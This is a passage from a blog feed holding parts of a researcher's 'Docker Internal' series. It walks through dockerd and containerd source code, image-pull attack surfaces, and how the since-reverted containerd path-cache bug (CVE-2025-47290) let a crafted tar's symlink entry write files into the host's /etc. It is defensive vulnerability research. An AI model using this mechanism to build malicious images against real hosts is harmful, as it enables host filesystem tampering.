<span class="k">func</span> <span class="n">applyNaive</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">root</span> <span class="kt">string</span><span class="p">,</span> <span class="n">r</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">,</span> <span class="n">options</span> <span class="n">ApplyOptions</span><span class="p">)</span> <span class="p">(</span><span class="n">size</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">root</span> <span class="o">=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Clean</span><span class="p">(</span><span class="n">root</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">hdr</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">tr</span><span class="o">.</span><span class="n">Next</span><span class="p">()</span> <span class="c">// [1]</span>
        <span class="c">// [...]</span>
        <span class="n">ppath</span><span class="p">,</span> <span class="n">base</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Split</span><span class="p">(</span><span class="n">hdr</span><span class="o">.</span><span class="n">Name</span><span class="p">)</span>
        <span class="n">ppath</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">fs</span><span class="o">.</span><span class="n">RootPath</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="n">ppath</span><span class="p">)</span>
        <span class="n">path</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">ppath</span><span class="p">,</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="s">"/"</span><span class="p">,</span> <span class="n">base</span><span class="p">))</span> <span class="c">// [2]</span>
        <span class="c">// [...]</span>
        <span class="n">srcData</span> <span class="o">:=</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">(</span><span class="n">tr</span><span class="p">)</span>
        <span class="n">srcHdr</span> <span class="o">:=</span> <span class="n">hdr</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">createTarFile</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">root</span><span class="p">,</span> <span class="n">srcHdr</span><span class="p">,</span> <span class="n">srcData</span><span class="p">,</span> <span class="n">options</span><span class="o">.</span><span class="n">NoSameOwner</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">createTarFile()</code> is a custom tar handler. It parses the <strong>tar entry header</strong> to determine the file type, and then performs the corresponding file operation to extract the file. For example, if the entry is a directory [4], the mkdir is called to create the target directory [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// pkg/archive/tar.go</span>
<span class="k">func</span> <span class="n">createTarFile</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">extractDir</span> <span class="kt">string</span><span class="p">,</span> <span class="n">hdr</span> <span class="o">*</span><span class="n">tar</span><span class="o">.</span><span class="n">Header</span><span class="p">,</span> <span class="n">reader</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">,</span> <span class="n">noSameOwner</span> <span class="kt">bool</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">switch</span> <span class="n">hdr</span><span class="o">.</span><span class="n">Typeflag</span> <span class="p">{</span>
    <span class="k">case</span> <span class="n">tar</span><span class="o">.</span><span class="n">TypeDir</span><span class="o">:</span> <span class="c">// [4]</span>
        <span class="c">// [...]</span>
        <span class="k">if</span> <span class="n">fi</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">os</span><span class="o">.</span><span class="n">Lstat</span><span class="p">(</span><span class="n">path</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="o">||</span> <span class="o">!</span><span class="n">fi</span><span class="o">.</span><span class="n">IsDir</span><span class="p">()</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">mkdir</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">hdrInfo</span><span class="o">.</span><span class="n">Mode</span><span class="p">());</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [5]</span>
                <span class="k">return</span> <span class="n">err</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<h2 id="3-attack-surfaces">3. Attack Surfaces</h2>

<p>From the pull flow, the following two operations directly access attack-controllable data:</p>
<ol>
  <li>Manifest/Index JSON parsing (<code class="language-plaintext highlighter-rouge">fetch()</code>)</li>
  <li>Tar extraction (<code class="language-plaintext highlighter-rouge">applyNaive()</code> / <code class="language-plaintext highlighter-rouge">createTarFile()</code>)</li>
</ol>

<p>The threat model here is that the attacker compromises the registry server, or the attacker publishes a crafted image manifest or image tar file, which is then downloaded by the victim.</p>

<h3 id="31-parse-json">3.1. Parse JSON</h3>

<p>Basically, the descriptor is fetched from the remote, so most of <code class="language-plaintext highlighter-rouge">desc.XXXX</code> is controllable by the attacker. However, I didn’t find anything useful or vulnerable. Its use is very limited 😢.</p>

<h3 id="32-tar-extraction">3.2. Tar Extraction</h3>

<p>When it comes to tar extraction, the tar slip attack is the first technique that comes to my mind, but Docker does a pretty good job of mitigating this kind of problem.</p>

<p><code class="language-plaintext highlighter-rouge">hdr.Name</code> is the path name extracted from the tar entry. It is first split into two parts: directory and filename. For example, <code class="language-plaintext highlighter-rouge">"../../../a"</code> becomes <code class="language-plaintext highlighter-rouge">"../../../"</code> and <code class="language-plaintext highlighter-rouge">"a"</code>. Later, the directory part is passed to <code class="language-plaintext highlighter-rouge">.RootPath()</code> to resolve the full path.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// pkg/archive/tar.go</span>
<span class="k">func</span> <span class="n">applyNaive</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">root</span> <span class="kt">string</span><span class="p">,</span> <span class="n">r</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">,</span> <span class="n">options</span> <span class="n">ApplyOptions</span><span class="p">)</span> <span class="p">(</span><span class="n">size</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">ppath</span><span class="p">,</span> <span class="n">base</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Split</span><span class="p">(</span><span class="n">hdr</span><span class="o">.</span><span class="n">Name</span><span class="p">)</span>
    <span class="n">ppath</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">fs</span><span class="o">.</span><span class="n">RootPath</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="n">ppath</span><span class="p">)</span>
    <span class="n">path</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">ppath</span><span class="p">,</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="s">"/"</span><span class="p">,</span> <span class="n">base</span><span class="p">))</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So <code class="language-plaintext highlighter-rouge">fs.RootPath()</code> has to make sure the resolved <code class="language-plaintext highlighter-rouge">ppath</code> is inside the root directory — and how does it do that?</p>

<p>We won’t trace the real code here because it’s unnecessary. Just two points to know for safe path resolution:</p>
<ol>
  <li><strong>Clamp every <code class="language-plaintext highlighter-rouge">".."</code> at the root</strong>: it calls <code class="language-plaintext highlighter-rouge">filepath.Join("/", path)</code> so <code class="language-plaintext highlighter-rouge">"/.."</code> is restricted inside the root.</li>
  <li><strong>Manually resolve the softlink</strong>: it calls <code class="language-plaintext highlighter-rouge">lstat</code> to get the target path and re-bounds it to the root.</li>
</ol>

<h2 id="4-past-vulnerability">4. Past Vulnerability</h2>

<p>When I was looking for past vulnerabilities, there weren’t that many, but CVE-2025-47290 caught my eye — a vulnerability that makes <code class="language-plaintext highlighter-rouge">containerd</code> overwrite host filesystem files when pulling an image.</p>

<p>This vulnerability was found by researcher Tõnis Tiigi, and the advisory is <a href="https://github.com/advisories/GHSA-cm76-qm8v-3j95">here</a>.</p>

<p>In the older version <code class="language-plaintext highlighter-rouge">containerd</code>, the <code class="language-plaintext highlighter-rouge">cachedRootPath</code> structure is used as a cache for path resolution.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">type</span> <span class="n">cachedRootPath</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">root</span>  <span class="kt">string</span>
    <span class="n">cache</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">newCachedRootPath</span><span class="p">(</span><span class="n">root</span> <span class="kt">string</span><span class="p">)</span> <span class="o">*</span><span class="n">cachedRootPath</span> <span class="p">{</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">cachedRootPath</span><span class="p">{</span>
        <span class="n">root</span><span class="o">:</span>  <span class="n">root</span><span class="p">,</span>
        <span class="n">cache</span><span class="o">:</span> <span class="nb">make</span><span class="p">(</span><span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span><span class="p">),</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">cachedRootPath</span><span class="p">)</span> <span class="n">get</span><span class="p">(</span><span class="n">path</span> <span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="kt">string</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">hit</span><span class="p">,</span> <span class="n">ok</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">cache</span><span class="p">[</span><span class="n">path</span><span class="p">];</span> <span class="n">ok</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">hit</span><span class="p">,</span> <span class="no">nil</span>
    <span class="p">}</span>
    <span class="n">p</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">fs</span><span class="o">.</span><span class="n">RootPath</span><span class="p">(</span><span class="n">c</span><span class="o">.</span><span class="n">root</span><span class="p">,</span> <span class="n">path</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="k">return</span> <span class="s">""</span><span class="p">,</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="n">c</span><span class="o">.</span><span class="n">cache</span><span class="p">[</span><span class="n">path</span><span class="p">]</span> <span class="o">=</span> <span class="n">p</span>
    <span class="k">return</span> <span class="n">p</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p>For example, if <strong>multiple tar entries</strong> are in the same directory, only the first call to <code class="language-plaintext highlighter-rouge">rootPath.get()</code> enters the real file resolution <code class="language-plaintext highlighter-rouge">fs.RootPath()</code>, and the following entries can just read the path from the cache. Since <code class="language-plaintext highlighter-rouge">fs.RootPath(c.root, path)</code> ensures the resolved path is inside the root, it looks like there’s no problem.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ppath</span><span class="p">,</span> <span class="n">base</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Split</span><span class="p">(</span><span class="n">hdr</span><span class="o">.</span><span class="n">Name</span><span class="p">)</span>
<span class="n">ppath</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">rootPath</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">ppath</span><span class="p">)</span>
</code></pre></div></div>

<p>However, the tar supports <strong>entries with the same name</strong>, and how this case is handled depends on the client side. Here, <code class="language-plaintext highlighter-rouge">containerd</code> handles them according to the following two rules:</p>
<ol>
  <li>dir-over-dir: <strong>merge</strong>. Existing is a directory and new header is also TypeDir -&gt; keep the directory, just <strong>re-apply metadata</strong>.</li>
  <li>everything else: <strong>remove + replace</strong>. Any other combination (file-over-file, file-over-dir, dir-over-file, symlink, etc.) -&gt; <code class="language-plaintext highlighter-rouge">os.RemoveAll(path)</code> wipes the old entry first.</li>
</ol>

<p>Suppose we first create a new file in <code class="language-plaintext highlighter-rouge">/a/b</code>, making the <code class="language-plaintext highlighter-rouge">/a</code> cache loaded.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"/a" -&gt; "/host/root/a"
</code></pre></div></div>

<p>Later, we do a dir-over-symlink, replacing <code class="language-plaintext highlighter-rouge">/a</code> directory with a symlink pointing to <code class="language-plaintext highlighter-rouge">/etc</code>. Then we create another new file <code class="language-plaintext highlighter-rouge">/a/c</code>. The actual path should be resolved to <code class="language-plaintext highlighter-rouge">/host/root/etc</code> by <code class="language-plaintext highlighter-rouge">fs.RootPath()</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"/a" -&gt; "/host/root/a"                     # cached
"/a" -&gt; "/host/root/a" --symlink--&gt; "/etc" # actual
</code></pre></div></div>

<p>However, because of the cache mechanism, the <code class="language-plaintext highlighter-rouge">/a</code> still points to <code class="language-plaintext highlighter-rouge">/host/root/a</code>, which is a symlink to the host’s <code class="language-plaintext highlighter-rouge">/etc</code>, and the file finally ends up in <code class="language-plaintext highlighter-rouge">/etc/c</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"/a/c" -&gt; "/host/root/a/c" # expected
       -&gt; "/etc/c"         # actual
</code></pre></div></div>

<p>It sounds like a pretty critical vulnerability — why don’t more people know about it?</p>

<p>Because it was introduced on <strong>Mar 8, 2025</strong> (<a href="https://github.com/containerd/containerd/pull/11337/changes">file diff</a>) and later reverted on <strong>May 21, 2025</strong> (<a href="https://github.com/containerd/containerd/commit/cada13298fba85493badb6fecb6ccf80e49673cc">revert commit</a>), which means this bug was only alive for about two weeks, within a single sub-version (2.1.0 -&gt; 2.1.1).</p>

<h2 id="5-summary">5. Summary</h2>

<p>In this post, we’ve covered the pull flow and discussed the attack surfaces. In the next post, we’ll analyze how Docker uses <code class="language-plaintext highlighter-rouge">runc</code> to load a container, and take the NVIDIA toolkit as an example to understand how vendors bridge or customize their implementation within the Docker system.</p>]]></content><author><name></name></author><category term="Linux" /><summary type="html"><![CDATA[In the last post, we introduced the relationship between the components in the Docker system, and in this post, we’ll discuss the attack surfaces.]]></summary></entry><entry><title type="html">Docker Internal (1)</title><link href="https://u1f383.github.io/linux/2026/05/27/Docker-Internal-1.html" rel="alternate" type="text/html" title="Docker Internal (1)" /><published>2026-05-27T00:00:00+00:00</published><updated>2026-05-27T00:00:00+00:00</updated><id>https://u1f383.github.io/linux/2026/05/27/Docker-Internal-1</id><content type="html" xml:base="https://u1f383.github.io/linux/2026/05/27/Docker-Internal-1.html"><![CDATA[<p>For this year’s (2026) Pwn2Own Berlin, I tried to find vulnerabilities in Docker but came up with nothing. This post simply documents my research on Docker’s system implementation, since it is quite interesting.</p>

<p>The attack scenario involves downloading an unknown image or running a malicious image, so I only focus on its architecture and then delve into the code that accesses user-controllable data.</p>

<p>This series is expected to be divided into three parts, covering basic Docker’s architecture, attack surfaces, past vulnerabilities, and the NVIDIA toolkit as a bonus! I hope you enjoy these posts and learn something new 🙂.</p>

<h2 id="1-introduction">1. Introduction</h2>

<p>First, there are a few Docker products that may confuse readers. The most common one is <a href="https://docs.docker.com/engine/install/ubuntu/">Docker Engine</a>, and another is <a href="https://www.docker.com/products/docker-desktop/">Docker Desktop</a>, which is relatively niche but more user-friendly since it provides a GUI and runs containers inside a <strong>lightweight VM</strong> (for example, QEMU-KVM). Here, we are discussing <strong>Docker Engine</strong>, not the Docker Desktop.</p>

<p>If you follow the installation steps for Docker Engine on Ubuntu, you’ll notice that <code class="language-plaintext highlighter-rouge">containerd</code> is installed as well!</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>apt <span class="nb">install </span>docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
                                         ^^^^^^^^^^^^^
</code></pre></div></div>

<p>In fact, the Docker Engine consists of several components: the CLI tool (<code class="language-plaintext highlighter-rouge">docker-cli</code>), the frontend (<code class="language-plaintext highlighter-rouge">dockerd</code>), the backend (<code class="language-plaintext highlighter-rouge">containerd</code>), the container’s shim daemon (<code class="language-plaintext highlighter-rouge">containerd-shim-runc-v2</code>) and loader (<code class="language-plaintext highlighter-rouge">runc</code>). The interaction between each components looks like this:</p>

<p><img src="/assets/image-20260526000000001.png" alt="image-20260526000000001" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<p>When executing a command like <code class="language-plaintext highlighter-rouge">docker run -it ubuntu /bin/bash</code>, <code class="language-plaintext highlighter-rouge">docker-cli</code> first connects to the Unix socket <code class="language-plaintext highlighter-rouge">docker.sock</code> and sends the request. Then, <code class="language-plaintext highlighter-rouge">dockerd</code> wraps the request in gRPC format and forwards it to <code class="language-plaintext highlighter-rouge">containerd</code> via the Unix socket <code class="language-plaintext highlighter-rouge">containerd.sock</code>. <code class="language-plaintext highlighter-rouge">containerd</code> is responsible for loading the image, invoking <code class="language-plaintext highlighter-rouge">runc</code> to create a container, and managing the container lifecycle. Finally, the container is spawned in an isolated execution environment based on Linux namespace, capabilities and cgroups.</p>

<p>As the backend of Docker Engine, or precisely <strong>the container runtime</strong>, <code class="language-plaintext highlighter-rouge">containerd</code> can also be used by other engines or orchestrators, such as Kubernetes.</p>

<p>By the way, according to the Pwn2Own rules, Docker Engine and <code class="language-plaintext highlighter-rouge">containerd</code> are listed as two separate targets, but since Docker Engine appears to depend on <code class="language-plaintext highlighter-rouge">containerd</code> as its backend and cannot run on its own, I’m not sure what the attack scenarios for each would be.</p>

<p>Anyway, let’s first take a look at how the <code class="language-plaintext highlighter-rouge">dockerd</code> handles HTTP requests and sends gRPC requests to <code class="language-plaintext highlighter-rouge">containerd</code>!</p>

<h2 id="2-dockerd">2. dockerd</h2>

<p>The source code for both <code class="language-plaintext highlighter-rouge">docker-cli</code> and <code class="language-plaintext highlighter-rouge">dockerd</code> can be found in the <a href="https://github.com/moby/moby">moby/moby GitHub repo</a>.</p>

<h3 id="21-register-api-endpoints">2.1. Register API Endpoints</h3>

<p>The entry point of the Docker daemon (<code class="language-plaintext highlighter-rouge">dockerd</code>) is <code class="language-plaintext highlighter-rouge">start()</code> in <code class="language-plaintext highlighter-rouge">daemon/command/daemon.go</code>. <code class="language-plaintext highlighter-rouge">start()</code> creates an HTTP server [1] that supports both the <strong>gRPC protocol</strong> [2] and the <strong>HTTP protocol</strong> [3], since other CLI tools may communicate via gRPC.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/command/daemon.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">cli</span> <span class="o">*</span><span class="n">daemonCLI</span><span class="p">)</span> <span class="n">start</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">(</span><span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">httpServer</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">http</span><span class="o">.</span><span class="n">Server</span><span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="k">var</span> <span class="n">p</span> <span class="n">http</span><span class="o">.</span><span class="n">Protocols</span>
    <span class="n">p</span><span class="o">.</span><span class="n">SetHTTP1</span><span class="p">(</span><span class="no">true</span><span class="p">)</span>
    <span class="n">p</span><span class="o">.</span><span class="n">SetHTTP2</span><span class="p">(</span><span class="no">true</span><span class="p">)</span>
    <span class="n">p</span><span class="o">.</span><span class="n">SetUnencryptedHTTP2</span><span class="p">(</span><span class="no">true</span><span class="p">)</span>

    <span class="n">routers</span> <span class="o">:=</span> <span class="n">buildRouters</span><span class="p">(</span><span class="n">routerOptions</span><span class="p">{</span>
        <span class="n">features</span><span class="o">:</span> <span class="n">d</span><span class="o">.</span><span class="n">Features</span><span class="p">,</span>
        <span class="n">daemon</span><span class="o">:</span>   <span class="n">d</span><span class="p">,</span>
        <span class="n">cluster</span><span class="o">:</span>  <span class="n">c</span><span class="p">,</span>
        <span class="n">builder</span><span class="o">:</span>  <span class="n">b</span><span class="p">,</span>
    <span class="p">})</span>
    <span class="n">gs</span> <span class="o">:=</span> <span class="n">newGRPCServer</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span>
    <span class="n">b</span><span class="o">.</span><span class="n">backend</span><span class="o">.</span><span class="n">RegisterGRPC</span><span class="p">(</span><span class="n">gs</span><span class="p">)</span> <span class="c">// [2]</span>
    <span class="n">httpServer</span><span class="o">.</span><span class="n">Protocols</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">p</span> <span class="c">// [3]</span>
    <span class="n">httpServer</span><span class="o">.</span><span class="n">Handler</span> <span class="o">=</span> <span class="n">newHTTPHandler</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">gs</span><span class="p">,</span> <span class="n">apiServer</span><span class="o">.</span><span class="n">CreateMux</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">routers</span><span class="o">...</span><span class="p">))</span> <span class="c">// [1]</span>
    <span class="c">// [...]</span>
    <span class="n">httpServer</span><span class="o">.</span><span class="n">Serve</span><span class="p">(</span><span class="n">ls</span><span class="p">)</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// daemon/command/httphandler.go</span>
<span class="k">func</span> <span class="n">newHTTPHandler</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">gs</span> <span class="o">*</span><span class="n">grpc</span><span class="o">.</span><span class="n">Server</span><span class="p">,</span> <span class="n">apiServer</span> <span class="n">http</span><span class="o">.</span><span class="n">Handler</span><span class="p">)</span> <span class="n">http</span><span class="o">.</span><span class="n">Handler</span> <span class="p">{</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">httpHandler</span><span class="p">{</span>
        <span class="n">ctx</span><span class="o">:</span>        <span class="n">ctx</span><span class="p">,</span>
        <span class="n">grpcServer</span><span class="o">:</span> <span class="n">gs</span><span class="p">,</span>
        <span class="n">apiServer</span><span class="o">:</span>  <span class="n">apiServer</span><span class="p">,</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">httpServer</code> is an <code class="language-plaintext highlighter-rouge">http.Server</code> object from Go’s <code class="language-plaintext highlighter-rouge">net/http</code> package, and the <code class="language-plaintext highlighter-rouge">ServeHTTP()</code> method of its <code class="language-plaintext highlighter-rouge">.Handler</code> field is called whenever a request arrives. It handles requests in two different ways: if the Content-Type in the HTTP request header is gRPC, the request is dispatched to gRPC server [4]; otherwise, the HTTP server treats it as a REST HTTP request and handle it accordingly [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/command/httphandler.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">h</span> <span class="o">*</span><span class="n">httpHandler</span><span class="p">)</span> <span class="n">ServeHTTP</span><span class="p">(</span><span class="n">w</span> <span class="n">http</span><span class="o">.</span><span class="n">ResponseWriter</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">r</span><span class="o">.</span><span class="n">ProtoMajor</span> <span class="o">==</span> <span class="m">2</span> <span class="o">&amp;&amp;</span> <span class="n">strings</span><span class="o">.</span><span class="n">HasPrefix</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">Header</span><span class="o">.</span><span class="n">Get</span><span class="p">(</span><span class="s">"Content-Type"</span><span class="p">),</span> <span class="s">"application/grpc"</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">h</span><span class="o">.</span><span class="n">grpcServer</span><span class="o">.</span><span class="n">ServeHTTP</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="n">r</span><span class="p">)</span> <span class="c">// [4]</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="n">h</span><span class="o">.</span><span class="n">apiServer</span><span class="o">.</span><span class="n">ServeHTTP</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="n">r</span><span class="p">)</span> <span class="c">// [5]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">buildRouters()</code> calls the <code class="language-plaintext highlighter-rouge">.NewRouter()</code> function of several packages to set up routing. Take the <code class="language-plaintext highlighter-rouge">container</code> package [6] as an example: its <code class="language-plaintext highlighter-rouge">initRoutes()</code> [7] function is called internally and defines the endpoints along with their handlers.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/command/daemon.go</span>
<span class="k">import</span> <span class="p">(</span>
    <span class="c">// [...]</span>
    <span class="s">"github.com/moby/moby/v2/daemon/server/router/container"</span>
    <span class="c">// [...]</span>
<span class="p">)</span>

<span class="k">func</span> <span class="n">buildRouters</span><span class="p">(</span><span class="n">opts</span> <span class="n">routerOptions</span><span class="p">)</span> <span class="p">[]</span><span class="n">router</span><span class="o">.</span><span class="n">Router</span> <span class="p">{</span>
    <span class="n">routers</span> <span class="o">:=</span> <span class="p">[]</span><span class="n">router</span><span class="o">.</span><span class="n">Router</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">container</span><span class="o">.</span><span class="n">NewRouter</span><span class="p">(</span><span class="n">opts</span><span class="o">.</span><span class="n">daemon</span><span class="p">),</span> <span class="c">// [6]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// daemon/server/router/container/container.go</span>
<span class="k">func</span> <span class="n">NewRouter</span><span class="p">(</span><span class="n">b</span> <span class="n">Backend</span><span class="p">)</span> <span class="n">router</span><span class="o">.</span><span class="n">Router</span> <span class="p">{</span>
    <span class="n">r</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">containerRouter</span><span class="p">{</span>
        <span class="n">backend</span><span class="o">:</span> <span class="n">b</span><span class="p">,</span>
    <span class="p">}</span>
    <span class="n">r</span><span class="o">.</span><span class="n">initRoutes</span><span class="p">()</span> <span class="c">// [7]</span>
    <span class="k">return</span> <span class="n">r</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">containerRouter</span><span class="p">)</span> <span class="n">initRoutes</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">c</span><span class="o">.</span><span class="n">routes</span> <span class="o">=</span> <span class="p">[]</span><span class="n">router</span><span class="o">.</span><span class="n">Route</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">router</span><span class="o">.</span><span class="n">NewPostRoute</span><span class="p">(</span><span class="s">"/containers/{name:.*}/pause"</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">postContainersPause</span><span class="p">),</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="22-send-request-to-containerd">2.2. Send Request to containerd</h3>

<p>Some endpoints simply return status or metadata, but others handle more complex tasks and need to forward requests to <code class="language-plaintext highlighter-rouge">containerd</code>. Here, we’ll use <strong>pausing a container</strong> as an example (since it’s more straightforward).</p>

<p>Pausing a container is handled by <code class="language-plaintext highlighter-rouge">postContainersPause()</code> [1], which internally calls <code class="language-plaintext highlighter-rouge">t.Task.Pause()</code> [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/server/router/container/container.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">containerRouter</span><span class="p">)</span> <span class="n">initRoutes</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">c</span><span class="o">.</span><span class="n">routes</span> <span class="o">=</span> <span class="p">[]</span><span class="n">router</span><span class="o">.</span><span class="n">Route</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">router</span><span class="o">.</span><span class="n">NewPostRoute</span><span class="p">(</span><span class="s">"/containers/{name:.*}/pause"</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">postContainersPause</span><span class="p">),</span> <span class="c">// [1]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// daemon/server/router/container/container_routes.go</span>
